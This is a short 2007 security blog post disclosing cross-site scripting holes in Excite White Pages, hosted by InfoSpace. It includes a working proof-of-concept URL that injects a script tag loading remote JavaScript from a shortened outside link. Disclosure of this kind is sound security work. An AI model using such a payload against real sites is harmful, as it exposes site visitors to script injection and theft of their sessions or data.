MOSEB-29 Bonus: Vulnerabilities in Excite White Pages

22:32 29.06.2007

New bonus vulnerabilities in Excite. In this case vulnerabilities at other domain, than in MOSEB-29: Vulnerabilitiy at money.excite.com.

The vulnerability is at Excite White Pages (kevdb.infospace.com) which located on server of InfoSpace (Excite’s partner). These Cross-Site Scripting holes I found 31.05.2007.

XSS:

The vulnerabilities are in qn, qf and qc parameters:
http://kevdb.infospace.com/info.xcite/wp/results/kevdb?OTMPL=%2Fwp%2Fresults.htm&QN=%3Cscript%20src=%22http://tinyurl.com/2tkq8d%22%3E%3C/script%3E&KCFG=US

Moral: seeking in white pages can be dangerous.

Note, that Excite engine belongs to IAC Search & Media. So Ask.com also responsible for these vulnerabilities.

Also note, that Excite White Pages engine use InfoSpace engine. So InfoSpace also responsible for these vulnerabilities.


Leave a Reply

You must be logged in to post a comment.